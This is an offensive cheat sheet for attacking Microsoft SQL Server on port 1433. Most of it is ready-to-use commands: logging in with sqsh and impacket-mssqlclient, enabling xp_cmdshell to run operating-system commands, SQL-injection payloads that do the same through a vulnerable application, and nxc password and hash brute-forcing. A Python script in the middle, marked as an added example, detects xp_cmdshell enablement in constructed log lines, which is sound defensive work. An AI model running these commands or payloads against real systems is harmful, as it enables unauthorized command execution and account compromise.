TCP: MSSQL - 1433
Initial Connection
Connect with a local SQL Server login
sqsh -S <Target IP Address> -U .\\<Username> -P <Password> -D <Database Name>
OR
impacket-mssqlclient [<Domain Name>/]<Username>:<Password>@<Target IP Address> -local-auth
Connect with Windows (domain) authentication
sqsh -S <Target IP Address> -U <Username> -P "<Password>"
OR
impacket-mssqlclient [<Domain Name>/]<Username>:<Password>@<Target IP Address> -windows-auth
Reverse Shell
On Machine
Initiate connection
If using sqsh, "GO" must be entered after every query to send it
Use the master database
Use master
Get users that can run xp_cmdshell
EXEC sp_helprotect 'xp_cmdshell'
Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
Enable advanced options, which is required before xp_cmdshell can be configured
sp_configure 'show advanced options', '1'
Apply changes
RECONFIGURE
Enable xp_cmdshell
sp_configure 'xp_cmdshell', '1'
Apply changes
RECONFIGURE
Run command
EXEC xp_cmdshell '<Command to execute>'
On SQLi vulnerability
Enable advanced options, which is required before xp_cmdshell can be configured
'; EXEC sp_configure "show advanced options", 1; -- //
Apply changes
'; RECONFIGURE -- //
Enable xp_cmdshell
'; EXEC sp_configure "xp_cmdshell", 1; -- //
Apply changes
'; RECONFIGURE -- //
Run commands
'; EXEC xp_cmdshell "<Command to execute>"; -- //
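Both procedures above (interactive and via SQLi) leave the same trace: SQL Server writes a "Configuration option ... changed" message (Msg 15457) to its error log each time sp_configure flips an option. The following detection script is an added example, not part of the original cheat sheet; the log lines are constructed and only approximate the real error log layout, and the function names are the author's own.

```python
import re

# Constructed sample error-log lines (format approximated, not a real capture).
SAMPLE_LOG = """\
2024-05-01 10:12:03.11 spid55 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 10:12:03.45 spid55 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-05-01 10:13:00.00 spid57 Configuration option 'max degree of parallelism' changed from 0 to 4. Run the RECONFIGURE statement to install.
2024-05-01 10:20:11.02 spid55 Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# The two options the page's procedure has to enable, in that order.
WATCHED_OPTIONS = {"show advanced options", "xp_cmdshell"}

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<spid>spid\d+) "
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)


def find_enablements(log_text):
    """Return one record per line that turns a watched option from 0 to non-zero.

    Lines that disable an option (1 -> 0) or touch unrelated options are ignored.
    """
    hits = []
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue
        if m["option"] in WATCHED_OPTIONS and m["old"] == "0" and m["new"] != "0":
            hits.append({"ts": m["ts"], "spid": m["spid"], "option": m["option"]})
    return hits


def sessions_enabling_xp_cmdshell(hits):
    """Return the spids that enabled both watched options, i.e. the full chain
    from the page (show advanced options -> xp_cmdshell) issued from one session."""
    by_spid = {}
    for h in hits:
        by_spid.setdefault(h["spid"], []).append(h["option"])
    return sorted(spid for spid, opts in by_spid.items()
                  if "show advanced options" in opts and "xp_cmdshell" in opts)


if __name__ == "__main__":
    for h in find_enablements(SAMPLE_LOG):
        print(f"{h['ts']} {h['spid']} enabled '{h['option']}'")
    print("sessions completing the chain:", sessions_enabling_xp_cmdshell(find_enablements(SAMPLE_LOG)))
```

Alerting on the pair from one spid, rather than on either message alone, avoids flagging routine changes such as the max degree of parallelism line above.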
Bruteforce
nxc mssql <Target IP Address> -d <Domain Name> -u <Username List> -p <Password List> --continue-on-success
nxc mssql <Target IP Address> -d <Domain Name> -u <Username List> -H <Hash List> --continue-on-success